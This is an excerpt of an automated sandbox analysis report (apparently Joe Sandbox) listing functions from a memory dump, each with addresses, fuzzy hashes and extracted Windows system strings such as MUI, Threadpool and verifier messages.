Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 41C1CD312043569BDB25CF28C844B2BFBE6EF84318F084B3DF9958A290D7B5D905CB82

Function 02690CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

ResIdCount less than 2., xrefs: 026EEEC9
Failed to retrieve service checksum., xrefs: 026EEE56

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: 07ec11088897d0606d72e25657ecdcc7f364b2c8b6bdc87b259087d800401c55
Instruction ID: fe416226b5ed413f04f7e385d18f3d13cb611ea122225276e0715df1ef63aeb3
Opcode Fuzzy Hash: 07ec11088897d0606d72e25657ecdcc7f364b2c8b6bdc87b259087d800401c55
Instruction Fuzzy Hash: BAE1F4B19087849FD724CF19C440BABBBE4FB89714F508A2EE59D8B380DB719509CF96

Function 0270E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0270E75A
UEFI, xrefs: 0270E751

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 2eee6ba94d6016962413583151932b41f76e2dddc4d45b84b5324503bdeda0ca
Instruction ID: 025af370edba4e732f0c45a2fc0a075e7c6f4754f92ceabee234c283dcc83d3c
Opcode Fuzzy Hash: 2eee6ba94d6016962413583151932b41f76e2dddc4d45b84b5324503bdeda0ca
Instruction Fuzzy Hash: 41615B71E04209DFDB24DFA8C881BAEBBF9FB44704F14446EE649EB291D731A944CB54

Function 027343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 02734437
MUI, xrefs: 02734525

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 881c0a2e5d13d009db88b370a99fb98c12aad211e45fa49a36bd955e1e24c6ef
Instruction ID: d2fdccc3201e871cc7cf7a052d721867e160b58a9d47bbed3d07dc75d3f600f7
Opcode Fuzzy Hash: 881c0a2e5d13d009db88b370a99fb98c12aad211e45fa49a36bd955e1e24c6ef
Instruction Fuzzy Hash: 78512871E0021DAEDF11DFA5CCA0AEEBBB9EB44758F100529E911B7291D7349D05CFA4

Function 026904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 02690540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0269063D

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 8577826ea2fcc582161de86fe96bad39a9c4bd1a12e74d19ce19555dc53207de
Instruction ID: 45f9d51c41d53d30305cebba0456647d4fdef38d28a0213cdeecc3b9db49d06e
Opcode Fuzzy Hash: 8577826ea2fcc582161de86fe96bad39a9c4bd1a12e74d19ce19555dc53207de
Instruction Fuzzy Hash: DA51AF716047429FCB24EF64C5407A7B7E9AF85304F20883EEAAA87340EB70E545CF96

Function 0269A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0269A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0269A2FB

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: e0f29c50f3bf770db012b1b9d43b3d1dd27dc823c51c07f053cf5905b00fac49
Instruction ID: 91eba4a782362b6e1e53385be38ff89346a70c191d9e2e2547eee76994f7cad4
Opcode Fuzzy Hash: e0f29c50f3bf770db012b1b9d43b3d1dd27dc823c51c07f053cf5905b00fac49
Instruction Fuzzy Hash: E6418830A04649DBCF25CFA9C990B6AB7F9AF85718F2440A9ED00DB391EB75D901CB50

Function 026CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 026CA5E4
Threadpool!, xrefs: 026CA5E9

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 1d6073302dc4911cd32418a92a587b8877f7df54f7c9115f07552adb67bc4f27
Instruction ID: 32a32fa727a325ae7baf0e6cbc0f677af5b88a907f4b8f012a90483c063ec628
Opcode Fuzzy Hash: 1d6073302dc4911cd32418a92a587b8877f7df54f7c9115f07552adb67bc4f27
Instruction Fuzzy Hash: 0B01F4B2690788AFE311EF54CD4AF2677E8E744719F10893DE549C7290E334D804CB4A

Function 0269C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0269C8C3, 0269CA40

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f3299ff664370070b145c363397e9fb9c5491761d8f737f22c4fa1e86aa02998
Instruction ID: 4df9bd585b44e2eca791dab97926da72dc94e95b48cc538a224049e171b63739
Opcode Fuzzy Hash: f3299ff664370070b145c363397e9fb9c5491761d8f737f22c4fa1e86aa02998
Instruction Fuzzy Hash: 4B825A75E002588FDF28DFA9C980BEDB7B9BF49714F14816AD819AB390DB309942CF54

Function 026E2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

P`vRbv, xrefs: 026E300D, 026E33E4, 026E343B, 026E34FE, 026E352E

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: P`vRbv
API String ID: 0-2392986850
Opcode ID: 12cb5f5d14e6db1fecc1677e1e4e694c719b8098642b2d076c09ac18b22111ba
Instruction ID: 49511833dc397f50d3c7d009c3ef72e9f76403e1a5db4f36ba0ac57c9a2586ec
Opcode Fuzzy Hash: 12cb5f5d14e6db1fecc1677e1e4e694c719b8098642b2d076c09ac18b22111ba
Instruction Fuzzy Hash: CB4206B1D06299AEDF28DF68D8447FDBBB1AF45314F24809EE443AB380D73589A1CB54

Function 0273CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON

Download Yara Rule

Strings

@, xrefs: 0273CDAC

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
Instruction ID: 0b06d5643cdabb9790bc5adbe8785761e6a0800bedd2a447f2cc1b7be4f68f28
Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
Instruction Fuzzy Hash: 27621870D012188FCB98DF9AC4D4AADB7B2FF8C311F60819AE9816B745C7356A16CF60

Function 026B2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 026B3240

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 830c0b19ad470f4f69bee4d449b8387f351035f7f929c66e957cc5973e8005ed
Instruction ID: e7103d8322bd648e3f52ba00def58760ce298f4a338b183ed41e8ed97c5c6c16
Opcode Fuzzy Hash: 830c0b19ad470f4f69bee4d449b8387f351035f7f929c66e957cc5973e8005ed
Instruction Fuzzy Hash: 71F1B371B08385CFCB26CF24C490BAAB7E5BF88714F0548ADE98987740DB34D999CB52

Function 02692FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 026930D6, 02693124

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 26f80d8a7902e42498ad7bb2968600c3e7eb18bd8043276e565b14f1a2487799
Instruction ID: fcb747e06d3779b97d90e4571773e509aa3de7a9d888e26f923f20e84a59c303
Opcode Fuzzy Hash: 26f80d8a7902e42498ad7bb2968600c3e7eb18bd8043276e565b14f1a2487799
Instruction Fuzzy Hash: 5CF1B071E40258EBDF25DF98D880ABEB7B9FF88704F558069E441AB350DB309862CF65

Function 0271EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 0271F05B

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: __aullrem
String ID:
API String ID: 3758378126-0
Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction ID: 01590c086f16ed45d0e3e0b5c4593eb992d7c8e914e6a733c24bda45fc007b6d
Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction Fuzzy Hash: 21418271F002199BCF18DFBCC8806AEF7F2FF88314B19827AD615E7680D63499508B90

Function 02741AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

., xrefs: 02741C01

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: d1b8b4d4a5394c34790d073f90625c97f0570e49b4c6ee46fc101cc88d4c6685
Instruction ID: 91c3dd599443c59ef99cc59a602749a3eef189b375a75c208c2942c71567b33c
Opcode Fuzzy Hash: d1b8b4d4a5394c34790d073f90625c97f0570e49b4c6ee46fc101cc88d4c6685
Instruction Fuzzy Hash: E1E19D75D002688FCF20EFA9C8406BDB7F1FF44704F94815AE889AB291DB749D92CB50

Function 02690100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 02690255

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 732a368d9bf95e72cd30ebf6599b7f36c26f581f40851807db049e0bd488d9fa
Instruction ID: e41f374c38fc410a1701b8ada08f34f8bfaa9fc1cf59f8839d5d493f7d98e81b
Opcode Fuzzy Hash: 732a368d9bf95e72cd30ebf6599b7f36c26f581f40851807db049e0bd488d9fa
Instruction Fuzzy Hash: 4EA13831A08268ABDF288A648981BFE77ED5F45718F0440ADED4BAB3C1DF718985CF54

Function 02744420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

, xrefs: 02744606

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8df4b4750076ef2750d466633f8afe81df7b1f116e15554e3d4a381d135951c5
Instruction ID: c19b7836f3991c0b98c48253a53eadef4465e789740356ca4d696b512d632d02
Opcode Fuzzy Hash: 8df4b4750076ef2750d466633f8afe81df7b1f116e15554e3d4a381d135951c5
Instruction Fuzzy Hash: 03A12431A003686ADF35CA24CC64FFE77B99F4A718F044498AD86AB281DF75C941EF64

Function 02716420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 027165C1

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4ea3acc2b2f82f46841b4b881b321e494ea0652257e7df278441436915dd1fec
Instruction ID: 3eb133d0d16ce2c2502c7a47b48b223c7d168eb22160eb88ee2dc3702064a951
Opcode Fuzzy Hash: 4ea3acc2b2f82f46841b4b881b321e494ea0652257e7df278441436915dd1fec
Instruction Fuzzy Hash: 91915171A41219AFDB21DB98CD95FEEB7B9EF04B50F100069F601AB290D774AD44CFA4

Function 0273E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0273E1FA

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0071d3002b4ccb36db084782244e556b7cea05e3605dfe2be27d7e14a43ae6bf
Instruction ID: e941852eeb4d6793c10996176a9bad4337188bea9b7074b791ea4b89425d18af
Opcode Fuzzy Hash: 0071d3002b4ccb36db084782244e556b7cea05e3605dfe2be27d7e14a43ae6bf
Instruction Fuzzy Hash: 9C919E32A01648BBDB23AFA4DC94FAFBB7AFF45744F100029F501A7252EB749941CB94

Function 026CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 027067C9

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: a967556ada73d7ab36d8ce2f6d2e7072cda394b0fbef2ad6f90118db7c3cfc62
Instruction ID: 62a73ee30f2dcaf31d8cfd207f84f6a72646bf6963def7ab1f7cca3dbb8e8cf6
Opcode Fuzzy Hash: a967556ada73d7ab36d8ce2f6d2e7072cda394b0fbef2ad6f90118db7c3cfc62
Instruction Fuzzy Hash: BA718D75E0021ACFDF28DF99C5A16ADBBF6BF48714F24812EE406A7280E7319855CF64

Function 02734978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 02734A7F

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 58319467594c08dfd8c1c03242f2bbba7375f9f392b60075d8e2cee31d94dbe8
Instruction ID: 2d66c7025d31598d1abd474a5e5020948b869d84ef0a478f01d8ef19c0cc4c66
Opcode Fuzzy Hash: 58319467594c08dfd8c1c03242f2bbba7375f9f392b60075d8e2cee31d94dbe8
Instruction Fuzzy Hash: 9851B172D002699BDF1ADF98C854AEEB7B9BF04B04F054169E911BB211D7349C01DFA8

Function 026AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 026AE6A4

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 7585c07a5d9333f66419ae41fd40cc48f38b6fb93d6f920eae9127cd572b8907
Instruction ID: bc9a3fa5d27bcd85cae1a1ce358ed32a31cae1fe17b0c830e4cb6b8c3d16d14f
Opcode Fuzzy Hash: 7585c07a5d9333f66419ae41fd40cc48f38b6fb93d6f920eae9127cd572b8907
Instruction Fuzzy Hash: F841A072508341ABD710DA74C990B6BB7E9AF88708F44093DFA85D7240EB75DD44CFA6

Function 0270C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0270C77F

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 10f45d01916c53c46b43ec79c4a29b8e6fd559e9a98ec0ba57fc7245e83de692
Instruction ID: 2cacace68c5f46e74775fee7bdb54f844a14bc04b51c96b864fa12d828f17409
Opcode Fuzzy Hash: 10f45d01916c53c46b43ec79c4a29b8e6fd559e9a98ec0ba57fc7245e83de692
Instruction Fuzzy Hash: 934126B1D0152CEBDB21DA50CC85FDEB77DAB45714F0045EAAB08AB180DB709E498F9C

Function 026BA470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

0{, xrefs: 026BA4AC, 026BA548, 026BA5A2, 026FE1FA

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: 0{
API String ID: 0-2980175769
Opcode ID: 97995e4ed2fdfe1ecc6c365b7dc2e2389087ecb5f810db0bfb82c8a9fcf1f498
Instruction ID: 6faea47d3ce40d75410070a41bd403abce7ddcb6e7aa765ee819a4aad98652fd
Opcode Fuzzy Hash: 97995e4ed2fdfe1ecc6c365b7dc2e2389087ecb5f810db0bfb82c8a9fcf1f498
Instruction Fuzzy Hash: 78419E32980205CFCB1ADFA8C8A0BED7BB1BF05314F144559D411AB391DB759E91CFA4

Function 02726B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 02726B91

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3e1c35f7b0cd65049a4b79454ce6ad71c6e187b581053455faeba31c4521a119
Instruction ID: 4de90efbf3626c066a289b8b4221fbb7ee7e8823956049fd3205c28d67a8e58e
Opcode Fuzzy Hash: 3e1c35f7b0cd65049a4b79454ce6ad71c6e187b581053455faeba31c4521a119
Instruction Fuzzy Hash: 47313931A017689BDB21EF69C850BEE77BDDF04708F50406EE841AB281DB75EC89CB54

Function 0270CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0270CAA2

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: b8e206e6069d1a290b5b754232f477b6ccad31bbed33dd2ea4c05385cdaec8a5
Instruction ID: de584d61820265d6270e4c422c80c7e8149f8bc53532a92b06b686c8a038a075
Opcode Fuzzy Hash: b8e206e6069d1a290b5b754232f477b6ccad31bbed33dd2ea4c05385cdaec8a5
Instruction Fuzzy Hash: FE310376E00559EFEB16DA59C891E6FB7B5EB80724F01426EA905A7290D730DE08CBE0

Function 0271892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0271895E

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 63c61ea18753ed8d5ad3403ca735878c433b59858fbfeeff5ee9a8f442852834
Instruction ID: e75ccc5c6cdc2f20467e63c290bea726e85d14fde9cfcffe8fb0ff5e8de2aaeb
Opcode Fuzzy Hash: 63c61ea18753ed8d5ad3403ca735878c433b59858fbfeeff5ee9a8f442852834
Instruction Fuzzy Hash: 88012B72740200DBF7216F5DDC8CB6B7B66EF81B64B15042CE68216555CF206881CA97

Function 026CE8F0 Relevance: 1.0, Instructions: 985COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b473c3fde5ab73a052ad3cf5d8090dd66f4fa4c7605aa9187a150571e026640a
Instruction ID: 695be804346971e2bc5ae10382f47e5a2da7b5f4f77a69b9f18bc95bf78c6ab6
Opcode Fuzzy Hash: b473c3fde5ab73a052ad3cf5d8090dd66f4fa4c7605aa9187a150571e026640a
Instruction Fuzzy Hash: 18823372F102188FCB58CFADD8916DDB7F2EF88314B19812DE41AEB345DA34AC568B45

Function 026D516C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050d40399044d82bd6cd35049e1f967e3f9ac1c0fece391dfeec88a6ca138f00
Instruction ID: ae353806491bf862bd7ff171e821165a50f840891273b8b12839fea891a27564
Opcode Fuzzy Hash: 050d40399044d82bd6cd35049e1f967e3f9ac1c0fece391dfeec88a6ca138f00
Instruction Fuzzy Hash: 0062AD72C0468EAFCF24CF08D4905AEBB72BE51358B99D658C89B67B04D371BA54CBD0

Function 02732000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5adf86503ede5bc960a3ce6e2f3d03fa63f3a1f21bc491da050c28f648be01
Instruction ID: 297e9fe99bec198fb28ab8029f4c9c233d3fdfe5a5d8b40ed9a2b8237900e230
Opcode Fuzzy Hash: 6b5adf86503ede5bc960a3ce6e2f3d03fa63f3a1f21bc491da050c28f648be01
Instruction Fuzzy Hash: 2442BC326083419BD726CF68C891A6BB7E6BF88304F48492DFE8297253D731DC45CB92

Function 026E739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04b42218e4557faf87b9ad755c0987c91e5064f74e0850fb7f859455116098e
Instruction ID: b4d02a30beb53cd8cb75b8a3cc0f3d4a5fdf5052641a886aee03257c87dd423e
Opcode Fuzzy Hash: f04b42218e4557faf87b9ad755c0987c91e5064f74e0850fb7f859455116098e
Instruction Fuzzy Hash: 98428D71A016169FDF1ACF59C8906AEF7B2FF88314B24856DD956AB340DB30E942CF90

Function 026E5AA0 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684

Function 026BB2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bca0bc5f7aa58ec1a701160b1144b62f502e377b65b31f7395ca83e1b95f11f
Instruction ID: 5bce7065b002c2f94ff6e553e62a772c06924554253bca6e82911907a6fba8fe
Opcode Fuzzy Hash: 4bca0bc5f7aa58ec1a701160b1144b62f502e377b65b31f7395ca83e1b95f11f
Instruction Fuzzy Hash: 28328E71E00219DBCF25DFA8D894BEEBBB5FF54718F180029E805AB391E7359951CB90

Function 02728158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa9c59a4b2c649a6e59097badc0f619b3a89f1527eaf5464814b3e6b564ac0f
Instruction ID: 72a38190789733b5ce89592aaf1722028551b083cc2d96789a13bcf8a372f26e
Opcode Fuzzy Hash: daa9c59a4b2c649a6e59097badc0f619b3a89f1527eaf5464814b3e6b564ac0f
Instruction Fuzzy Hash: 48427D71E002298FDB24CF69C881BADB7F6BF48304F148199E949EB242D735AD85CF61

Function 026A2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b3ae6a3c6bbd7212abbf7e95c375167e17a0ea463a2db70f7af31ee9be2829
Instruction ID: a86f6ea400dfce0a546bd4e8625dfb148644a733914d7d44ca0bd8e20b1ee1f1
Opcode Fuzzy Hash: f5b3ae6a3c6bbd7212abbf7e95c375167e17a0ea463a2db70f7af31ee9be2829
Instruction Fuzzy Hash: 3132BC70A007558BDF68CF69C8547BABBFABF84704F24811DDAA69B384D735A842CF50

Function 0273A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a2b859fadb0bd6fc58331b5f9af9753f498108215906ff0be22bbf32ebb73d
Instruction ID: 9a7868fffc08a0fc6ac4cab4e1e113e15367d994f4912d342d30f96db3647772
Opcode Fuzzy Hash: d9a2b859fadb0bd6fc58331b5f9af9753f498108215906ff0be22bbf32ebb73d
Instruction Fuzzy Hash: 6422DD71604661CBDB26CF29C096772B7F1BF45308F18849AE8D68F287E735E492CB61

Function 027516CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

